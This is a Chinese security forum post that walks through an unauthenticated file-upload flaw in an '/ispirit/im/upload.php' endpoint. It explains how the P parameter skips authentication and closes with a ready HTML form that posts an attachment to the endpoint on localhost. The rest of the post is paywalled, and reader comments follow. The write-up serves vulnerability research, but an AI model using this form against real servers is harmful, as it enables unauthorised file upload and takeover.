文件上传首先确定存在漏洞的文件。和文件上传相关的函数比如upload。在从上到下分析构造的条件
1. 从 POST 请求中提取变量 P 的值。
2. 检查 P 是否已设置且不为空字符串。
3. 如果 P 已设置且非空,进入包含 "inc/session.php" 文件,然后设置会话 ID 为 P,启动一个会话
4. 如果 P 未设置或为空,则包含 "auth.php" 文件。
post提交获取TYPE、DEST_UID值
DEST_UID=0就报错结束,不满足0就可以
有文件上传值大于等于1就会进入文件上传代码
upload不在第一个if,所以满不满足1都可以,都会执行。
如果没有检测到文件上传就提示,检测到就进if判断
判断文件大小可以控制
选择输出内容的模式
过滤是在upload里,过滤了后缀、文件名、大小等还有类名单验证
构造请求条件,要构造上传文件的表单
P=1 未授权
DEST_UID=1 进入逻辑
UOLOAD_MODE=1,2,3选择输出内容的模式
ATTACHMENT 就收文件上传的参数名
构造表单去触发upload文件比较快捷。
<html>
<body>
<form action="http://127.0.0.1/ispirit/im/upload.php" method="post" enctype="multipart/form-data">
<input type="text"name="P" value=1></input>
<input type="text"name="UPLOAD_MODE" value=1></input>
<input type="text" name="DEST_UID" value=1></input>
<input type="file" name="ATTACHMENT"></input>
<input type="submit" ></input>
</body>
</html>
更多内容已被隐藏
主题内容你需要付费可见 (点击购买) 售价:1 金币
用户名 | 金币 | 积分 | 时间 | 理由 |
---|---|---|---|---|
Track-魔方 | 400.00 | 0 | 2024-01-22 15:03:03 | 深度 100 普适 200 可读 100 |
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.
Track-魔方
发表于 11个月前
这是啥:
为啥前面是代码审计,后面又成了漏洞复现了呢,如果按照漏洞复现来算,这些漏洞就不在平台收录范围了
评论列表
加载数据中...
Track-魔方
发表于 11个月前
代码里面还是有些特殊字符编码或者干扰了,需要再稍微检查修正修正就行:
评论列表
加载数据中...
Track-魔方
发表于 11个月前
代码框里面的东西都在检查检查吧
评论列表
加载数据中...
17828147368
发表于 11个月前
这个会不会太老了
评论列表
加载数据中...
30118
发表于 11个月前
我瞅瞅
评论列表
加载数据中...
学kali的小白
发表于 11个月前
|| 这是或者的意思哦
评论列表
加载数据中...